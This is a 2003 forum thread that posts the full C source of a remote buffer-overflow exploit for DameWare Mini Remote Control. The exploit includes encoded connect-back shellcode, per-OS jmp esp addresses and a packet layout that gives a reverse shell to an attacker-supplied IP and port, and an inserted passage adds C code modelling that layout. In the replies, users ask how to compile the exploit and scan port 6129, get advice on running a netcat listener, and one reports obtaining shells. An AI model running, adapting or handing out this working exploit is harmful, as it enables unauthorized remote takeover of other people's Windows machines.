Forums: Dameware Mini Remote Control V3.73 Remote Exploit - Forums


Dameware Mini Remote Control V3.73 Remote Exploit by kralor [www.coromputer.net]

#1 User is offline   GaLiaRePt 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 77
  • Joined: 30-July 03

Posted 20 December 2003 - 06:19 AM

DameWare Mini Remote Control < v3.73 remote exploit
Date: 2003-12-20

Author: Iván Rodriguez Almuiña <kralor_@_coromputer.net>
Download: http://www.security-...oit/DameWeird.c

/**************************************************************************************/
/*     [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]    */
/* -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -  */
/* 8/10 win2k successfully exploited in blind mode (lang & type [pro,srv,etc] unknown) */
/* tested against dameware versions: v3.68  v3.72                                     */
/* In comments there's some information about offsets for jmp esp on diff OS.         */
/* I've fixed a problem in the shellc0de, when I check for kernel32.dll, on winXP it  */
/* is kernel32.dll, but on win2k it is KERNEL32.DLL (both in unicode format)          */
/* shellc0de is a bit long for this b0f, so ExitThread won't be called, but it is in  */
/* the shellcode. Some people reported 2 different offsets to me for winXP pro, home, */
/* sp0 or sp1, so I don't know why it's different, and as I don't have XP at home I   */
/* can't find another better EIP for XP (hope these 2 offsets will be enough).        */
/* greetz: MrNice,AnAc,TripaX & Decryptus for helping me to find the EIP values.      */
/*....................................................................................*/
/* information: kralor[at]coromputer.net,www.coromputer.net,irc undernet #coromputer  */
/**************************************************************************************/

#include <winsock.h>   /* must come before windows.h */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>    /* memcpy / memset / strcpy */
#include <ctype.h>     /* isprint(), used by the print_packet() debug helper */

#pragma comment (lib,"ws2_32")

/*
 * 0x717564B8   jmp esp in comctl32.dll
 * win2k fr adv srv sp2
 * win2k en adv srv sp3
 * win2k en adv srv sp4
 * win2k en srv     sp3
 * win2k fr pro     sp3
 * win2k en pro     sp4
 *
 * jmp esp @ 0x77E7898B | win2k fr adv srv sp 1
 * jmp esp @ 0x717564B8 | Win2k fr adv srv sp2 & Win2k en srv sp3 & Win2k en adv srv sp4 & win2k fr pro sp3
 * jmp esp @ 0x7751A3AB | Win2k fr adv srv sp2 Win2k fr adv srv sp3 & Win2k fr pro sp3
 */

/* per-service-pack return addresses, kept for reference only; the code uses RET / RET_XP below
#define RET_WIN2K_SP0 0x717564B8
#define RET_WIN2K_SP1 0x717564B8
#define RET_WIN2K_SP2 0x717564B8
#define RET_WIN2K_SP3 0x717564B8
#define RET_WIN2K_SP4 0x717564B8
#define RET_WINXP_SP0 0x7776FE1F
#define RET_WINXP_SP1 0x7776FE1F
*/

/* return addresses as little-endian byte strings, written straight into the packet */
#define RET    "\xB8\x64\x75\x71"   /* 0x717564B8, jmp esp in comctl32.dll (win2k, see table above) */
#define RET_XP "\x07\xD5\x36\x77"   /* 0x7736D507, winXP */
// or #define RET_XP "\xC1\x1C\x35\x77" // 0x77351CC1, this offset has been reported by many people

#define PORT 6129                   /* DameWare Mini Remote Control listener */
#define SIZEOF 4096                 /* size of the info block and of the evil packet */
/* fake client identity filled into the remaining fields of the packet */
#define WINUSER "h4x0r"
#define WINHOST "l33t_home"
#define USERPROFILE_NAME "script kiddie"
#define USERPROFILE_COMPANY "g33k solutions."
#define USERPROFILE_LICENSE "11111-OEM-0001111-11111"
#define USERPROFILE_DATE "12/24/03 00:00:00"
#define INTERFACE_IP "192.168.1.1,192.168.1.2"
#define WINDOMAIN "l33t_d0m41n"
#define CLIENT_VERSION "3.72.0.0"

/* debug helper (disabled): hex + ascii dump of buffer[begin..end), 10 bytes per row
void print_packet(char *buffer, int begin, int end)
{
	int i,j;
	char ascii[11];   // 10 characters per row plus the terminator

	for(i=begin,j=0;i<end;i++,j++) {
		if(i%10==0) {
			printf("\r\n%04d: ",i);
			j=0;
			memset(ascii,0,sizeof(ascii));
		}
		printf("0x%02x ",(unsigned char)buffer[i]);
		if(!isprint((unsigned char)buffer[i]))
			ascii[j]='.';
		else
			ascii[j]=buffer[i];
		if(i%10==9) {
			ascii[10]=0x00;
			printf("%s",ascii);
		}
	}
	printf("%s\r\n",ascii);
	return;
}
*/

/* connect to host:PORT, returns the socket or 0 on failure */
int cnx(char *host)
{
	int sock;
	struct sockaddr_in yeah;
	struct hostent *she;

	sock=socket(AF_INET,SOCK_STREAM,0);
	if(sock==INVALID_SOCKET) {      /* socket() signals failure with INVALID_SOCKET, not 0 */
		printf("error: unable to create socket\r\n");
		return 0;
	}
	memset(&yeah,0,sizeof(yeah));
	yeah.sin_family=AF_INET;
	yeah.sin_port=htons(PORT);

	/* try a hostname first, then fall back to a dotted-quad address */
	if((she=gethostbyname(host))!=NULL) {
		memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
	} else {
		if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
			printf("error: cannot resolve host\r\n");
			closesocket(sock);
			return 0;
		}
	}
	printf("[+] Connecting to %-30s ...",host);
	if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
		printf("error: connection failed (WSAGetLastError=%d)\r\n",WSAGetLastError());
		closesocket(sock);
		return 0;
	}
	printf("Done\r\n");
	return sock;
}

/* patch the connect-back address/port and the OS-specific bytes into the shellcode.
   The shellcode is XOR-encoded with 0x95 and decoded by its own stub at run time,
   so every byte written here is stored pre-XORed. */
void set_sc(int os, int sp, char *rhost, int rport, char *shellc0de)
{
	unsigned int ip=0;
	unsigned short port=0;
	char *port_to_shell="",*ip1="";

	(void)sp;   /* service pack no longer selects the EIP, see the commented switches below */

	ip = inet_addr(rhost); ip1 = (char*)&ip;   /* network byte order: octets in memory order */
	shellc0de[325]=ip1[0]^0x95;shellc0de[326]=ip1[1]^0x95;
	shellc0de[327]=ip1[2]^0x95; shellc0de[328]=ip1[3]^0x95;

	port = htons(rport);                        /* big-endian, as the shellcode's sockaddr expects */
	port_to_shell = (char *) &port;
	shellc0de[319]=port_to_shell[0]^0x95;
	shellc0de[320]=port_to_shell[1]^0x95;

	switch(os)
	{
	case 0: // win2k: nothing to patch, start_auth() picks RET
	/*
		switch(sp)
		{
		case 0:
			*(long*)&shellc0de[0]=RET_WIN2K_SP0;
			break;
		case 1:
			*(long*)&shellc0de[0]=RET_WIN2K_SP1;
			break;
		case 2:
			*(long*)&shellc0de[0]=RET_WIN2K_SP2;
			break;
		case 3:
			*(long*)&shellc0de[0]=RET_WIN2K_SP3;
			break;
		case 4:
			*(long*)&shellc0de[0]=RET_WIN2K_SP4;
			break;
		}
	*/
		break;
	case 1: // winXP: the module name is kernel32.dll, not KERNEL32.DLL (see header)
		// 0xde^0x95 = 'K', 0xfe^0x95 = 'k': flip the four pushed 'K' characters to 'k'
		shellc0de[167]=shellc0de[215]=(unsigned char)0xfe;
		shellc0de[345]=shellc0de[453]=(unsigned char)0xfe;
	/*
		switch(sp)
		{
		case 0:
			*(long*)&shellc0de[0]=RET_WINXP_SP0;
			break;
		case 1:
			*(long*)&shellc0de[0]=RET_WINXP_SP1;
			break;
		}
	*/
		break;
	}
	return;
}

int start_auth(int sock, char *rhost, int rport)
{
	int size,i=4,os,sp;
	char buffer[SIZEOF];
	char shellc0de[] =
        "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef"
        "\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95"
        "\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e"
        "\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad"
        "\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d"
        "\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96"
        "\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3"
        "\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3"
        "\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae"
        "\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd"
        "\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6"
        "\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8"
        "\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd"
        "\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e"
        "\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52"
        "\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3"
        "\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff"
        "\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95"
        "\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0"
        "\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97"
        "\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a"
        "\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a"
        "\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d"
        "\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52"
        "\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c"
        "\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4"
        "\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0"
        "\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc"
        "\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a";

	/* 1. server hello: expect 0x30 0x11 and echo it back with two flag bytes changed */
	size=recv(sock,buffer,SIZEOF,0);
	if(size<2||buffer[0]!=0x30||buffer[1]!=0x11) {
		printf("error: wrong data received\r\n");
		return -1;
	}
	buffer[28]=0x00;buffer[36]=0x01;
	send(sock,buffer,size,0);
	memset(buffer,0,SIZEOF);
	printf("[+] Gathering %-30s     ...","information");
	/* 2. read exactly one 4096-byte information block, never past the end of buffer */
	for(size=0;size<SIZEOF;size+=i) {
		i=recv(sock,&buffer[size],SIZEOF-size,0);
		if(i<=0) {
			printf("error: connection closed after %d bytes\r\n",size);
			return -1;
		}
	}

	if(buffer[0]!=0x10||buffer[1]!=0x27) {
		printf("error: wrong data received\r\n");
		return -1;
	}
	printf("Done\r\n");
	sp=(unsigned int)buffer[37];
	/* 3. fingerprint the OS from the info block: it selects the jmp esp address and the shellcode variant */
	printf("[i] Operating system : ");
	if(buffer[16]==0x28||buffer[17]==0x0a) {
		os=1;
		printf("WinXP");
	} else {
		printf("Win2000");
		os=0;
	}
	printf("\r\n[i] Service Pack     : %s\r\n",&buffer[37]);
	printf("[+] Setting shellc0de for this %-15s   ...","version");
	set_sc(os,sp,rhost,rport,shellc0de);

	/* 4. build the 4096-byte reply, keeping the 0x10 0x27 header:
	      416..595  NOP sled (0x90)
	      516..519  saved return address -> jmp esp
	      520..     shellcode (ESP points here after the ret, so jmp esp lands on it)
	      the other fields mimic a legitimate client; the strcpy at 975 overwrites the
	      tail of the shellcode, the ExitThread part the header says is never reached */
	memset(&buffer[2],0,SIZEOF-2);
	strcpy(&buffer[175],WINUSER);
	memset(&buffer[416],0x90,180);
	if(os==0)
		memcpy(&buffer[516],RET,4);
	else
		memcpy(&buffer[516],RET_XP,4);
	memcpy(&buffer[520],shellc0de,sizeof(shellc0de));
	strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
	strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
	strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
	strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
	strcpy(&buffer[2795],CLIENT_VERSION);
	printf("Done\r\n");
	printf("[+] Sending evil %-30s  ...","packet");
	send(sock,buffer,SIZEOF,0);
	memset(buffer,0,SIZEOF);
	size=recv(sock,buffer,SIZEOF,0);

	/* 5. a vulnerable server answers 0x32 0x11; anything else (or no answer) is reported as patched */
	if(size<2||buffer[0]!=0x32||buffer[1]!=0x11) {
		printf("Patched\r\n");
		return -1;
	}
	printf("Done\r\n");
	printf("[i] Shell should have arrived at %s:%d\r\n",rhost,rport);
	return 0;
}

void banner(void)
{
	printf("\r\n      [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]\r\n");
	printf("\t\t  www.coromputer.net && undernet #coromputer\r\n\r\n");
	return;
}

/* usage: <host> is the DameWare server; <your_ip> <your_port> is where the
   connect-back shell calls home, so start a listener there first */
int main(int argc, char *argv[])
{
	WSADATA wsaData;
	int sock;

	banner();
	if(argc!=4) {
		printf("syntax: %s <host> <your_ip> <your_port>\r\n",argv[0]);
		return -1;
	}
	if(WSAStartup(0x0101,&wsaData)!=0) {
		printf("error: unable to load winsock\r\n");
		return -1;
	}
	sock=cnx(argv[1]);
	if(!sock) {
		WSACleanup();
		return -1;
	}
	start_auth(sock,argv[2],atoi(argv[3]));
	closesocket(sock);
	WSACleanup();
	return 0;
}


Enjoy ;-)
0
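The packet layout and the encoded-field patching used by the exploit above, as an added example that is not part of kralor's DameWeird.c or of the original post. It models the offsets the exploit uses (NOP sled at 416, return address at 516, shellcode at 520, the USERPROFILE_NAME strcpy at 975, the XOR key 0x95 and the port/IP slots at 319 and 325 in the shellcode) with a constructed stand-in shellcode of the same 462-byte length, decodes it the way the stub does, and computes how many shellcode bytes the later strcpy overwrites, which is consistent with the header's remark that the ExitThread tail is never reached. parse_ipv4 stands in for inet_addr so the code runs without winsock; the addresses and port are made up.

```c
#include <stdio.h>
#include <string.h>

/* Offsets and sizes taken from the exploit above. */
#define PKT_SIZE         4096
#define SLED_OFF         416
#define SLED_LEN         180
#define RET_OFF          516
#define SC_OFF           520
#define SC_LEN           462     /* 28 lines of 16 bytes + 14 bytes, without the NUL */
#define XOR_KEY          0x95
#define PORT_OFF         319     /* shellc0de[319..320], big-endian port */
#define IP_OFF           325     /* shellc0de[325..328], octets in network order */
#define PROFILE_NAME_OFF 975     /* strcpy(&buffer[975], USERPROFILE_NAME) */

/* Number of bytes two [off, off+len) ranges share. */
int overlap_bytes(int a_off, int a_len, int b_off, int b_len)
{
    int lo = a_off > b_off ? a_off : b_off;
    int hi_a = a_off + a_len, hi_b = b_off + b_len;
    int hi = hi_a < hi_b ? hi_a : hi_b;
    return hi > lo ? hi - lo : 0;
}

/* Shellcode bytes clobbered by strcpy of "script kiddie" (13 chars + NUL) at 975. */
int shellcode_tail_clobbered(void)
{
    return overlap_bytes(SC_OFF, SC_LEN, PROFILE_NAME_OFF, (int)sizeof("script kiddie"));
}

/* What the decoder stub does at run time: xor every byte with the key. Encoding is the same op. */
void xor_bytes(unsigned char *p, size_t n, unsigned char key)
{
    for (size_t i = 0; i < n; i++) p[i] ^= key;
}

/* "a.b.c.d" -> four octets in network (memory) order; 0 on malformed input. */
int parse_ipv4(const char *s, unsigned char out[4])
{
    unsigned a, b, c, d; char tail;
    if (sscanf(s, "%u.%u.%u.%u%c", &a, &b, &c, &d, &tail) != 4) return 0;
    if (a > 255 || b > 255 || c > 255 || d > 255) return 0;
    out[0] = a; out[1] = b; out[2] = c; out[3] = d;
    return 1;
}

/* Mirror of set_sc(): store the connect-back address and port pre-XORed in the encoded shellcode. */
int patch_connectback(unsigned char *sc, size_t sc_len, const char *ip, unsigned port)
{
    unsigned char oct[4];
    if (sc_len < IP_OFF + 4 || port > 65535 || !parse_ipv4(ip, oct)) return 0;
    for (int i = 0; i < 4; i++) sc[IP_OFF + i] = oct[i] ^ XOR_KEY;
    sc[PORT_OFF]     = (unsigned char)(port >> 8) ^ XOR_KEY;     /* htons: high byte first */
    sc[PORT_OFF + 1] = (unsigned char)(port & 0xff) ^ XOR_KEY;
    return 1;
}

/* Round trip on a constructed stand-in (encoded all-zero bytes): patch, decode like the stub,
   copy out the decoded octets and return the decoded port in host order, or -1 on bad input. */
int decoded_port_after_patch(const char *ip, unsigned port, unsigned char decoded_ip[4])
{
    unsigned char sc[SC_LEN];
    memset(sc, XOR_KEY, sizeof sc);             /* constructed: 0x00 ^ 0x95 everywhere */
    if (!patch_connectback(sc, sizeof sc, ip, port)) return -1;
    xor_bytes(sc, sizeof sc, XOR_KEY);
    memcpy(decoded_ip, sc + IP_OFF, 4);
    return (sc[PORT_OFF] << 8) | sc[PORT_OFF + 1];
}

/* Lay the packet out as start_auth() does and return the offset just past the return
   address: that is where ESP points after the ret, so a jmp esp lands on the shellcode. */
int layout_packet(unsigned char *pkt, const unsigned char *sc, size_t sc_len, const unsigned char ret[4])
{
    if (sc_len > PKT_SIZE - SC_OFF) return -1;
    memset(pkt, 0, PKT_SIZE);
    pkt[0] = 0x10; pkt[1] = 0x27;                  /* header kept from the info block */
    memset(pkt + SLED_OFF, 0x90, SLED_LEN);        /* NOP sled */
    memcpy(pkt + RET_OFF, ret, 4);                 /* saved EIP -> jmp esp */
    memcpy(pkt + SC_OFF, sc, sc_len);
    return RET_OFF + 4;
}

/* 1 when every expectation about the model holds, 0 otherwise. */
int selfcheck(void)
{
    unsigned char ip[4], pkt[PKT_SIZE], sc[SC_LEN];
    const unsigned char ret_2k[4] = { 0xB8, 0x64, 0x75, 0x71 };  /* RET from the exploit, 0x717564B8 */
    if (decoded_port_after_patch("10.0.0.7", 4444, ip) != 4444) return 0;   /* made-up listener */
    if (ip[0] != 10 || ip[1] != 0 || ip[2] != 0 || ip[3] != 7) return 0;
    if (decoded_port_after_patch("10.0.0.300", 4444, ip) != -1) return 0;   /* bad octet rejected */
    memset(sc, 0xCC, sizeof sc);                                /* constructed stand-in shellcode */
    if (layout_packet(pkt, sc, sizeof sc, ret_2k) != SC_OFF) return 0;
    if (pkt[RET_OFF] != 0xB8 || pkt[RET_OFF - 1] != 0x90 || pkt[SC_OFF] != 0xCC) return 0;
    return shellcode_tail_clobbered() == 7;
}

int main(void)
{
    printf("model %s; strcpy at %d clobbers %d shellcode bytes\n",
           selfcheck() ? "ok" : "FAILED", PROFILE_NAME_OFF, shellcode_tail_clobbered());
    return 0;
}
```

The 7 clobbered bytes are the last 7 of the 462-byte shellcode (offsets 975..981 of the packet), plus the string's NUL over the copied terminator; the XP byte at shellc0de[453] (packet offset 973) lies just before that region, which is why the OS patch still takes effect.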

#2 Guest_X-FloppY_*

  • Group: Guests

Posted 20 December 2003 - 06:34 AM

Hmm, looks very nice.
Can someone compile it? :X
0

#3 User is offline   temptation 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 80
  • Joined: 30-November 03

Posted 20 December 2003 - 06:34 AM

DameWare Mini Remote Control
^^ On which port is this running?

thx
0

#4 User is offline   Lanig 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 70
  • Joined: 29-November 03

Posted 20 December 2003 - 06:37 AM

Hmm, to scan for this vuln I need to scan port 6129 (default for this service, I think),
or is there some better way?
0

#5 User is offline   Yosam 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 43
  • Joined: 06-September 03

Posted 20 December 2003 - 06:38 AM

Hmm, compiled successfully, but
what is <your_port>?
What should I put in there?

And how do I scan for this?
Which port should I scan, and what banner (if needed)?


thanks.
0

#6 Guest_X-FloppY_*

  • Group: Guests

Posted 20 December 2003 - 06:40 AM

Yosam, can you please post the compiled exploit,
so we can help?
0

#7 User is offline   PuPPaFiSH 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 42
  • Joined: 14-December 03

Posted 20 December 2003 - 06:52 AM

Thanks for the info, I'll try and compile it ;)
0

#8 User is offline   Divx_dude 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 108
  • Joined: 31-August 03

Posted 20 December 2003 - 07:03 AM

Yosam, on Dec 20 2003, 02:38 PM, said:

Hmm, compiled successfully, but
what is <your_port>?
What should I put in there?

And how do I scan for this?
Which port should I scan, and what banner (if needed)?


thanks.

Well, you need to run a shell on your PC on a port (for example, 444).

Then you go to the exploit and give it your IP plus the port that your nc is running on, on your PC.


Sorry for bad English
0

#9 Guest_X-FloppY_*

  • Group: Guests

Posted 20 December 2003 - 07:04 AM

I hate those who compile for themselves and don't post it,
it's annoying,
like Yosam.
0

#10 User is offline   KoNh 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 111
  • Joined: 29-August 03

Posted 20 December 2003 - 07:57 AM

X-FloppY, on Dec 20 2003, 03:04 PM, said:

I hate those who compile for themselves and don't post it,
it's annoying,
like Yosam.

Just try to compile it yourself; this way we can
try to keep out some script kiddies, unless you're one?
0

#11 Guest_X-FloppY_*

  • Group: Guests

Posted 20 December 2003 - 08:02 AM

Sorry m8, I don't know how to compile...
If you'd like to teach me, PM me :D
0

#12 User is offline   Divx_dude 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 108
  • Joined: 31-August 03

Posted 20 December 2003 - 08:10 AM

Dude ;) there are many progs for compiling ;)

Dev-C++ is a very good one ;) Try Google and search :)

Sorry for bad English
0

#13 Guest_X-FloppY_*

  • Group: Guests

Posted 20 December 2003 - 08:38 AM

OK dude, thanks
(:
BTW, can you compile this exploit for now?
0

#14 User is offline   JdEeZy 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 47
  • Joined: 19-August 03

Posted 20 December 2003 - 11:17 AM

great exploit, got some shells.
0

#15 User is offline   Axl 

  • Sergeant First Class
  • Icon
  • Group: Specialist
  • Posts: 338
  • Joined: 13-December 03

Posted 20 December 2003 - 12:49 PM

Lanig, on Dec 20 2003, 02:37 PM, said:

Hmm, to scan for this vuln I need to scan port 6129 (default for this service, I think),
or is there some better way?

I find scanning for 6129 to be most likely the best way. The problem is, at least on the ranges I scan, nobody has 6129 open :angry:
0
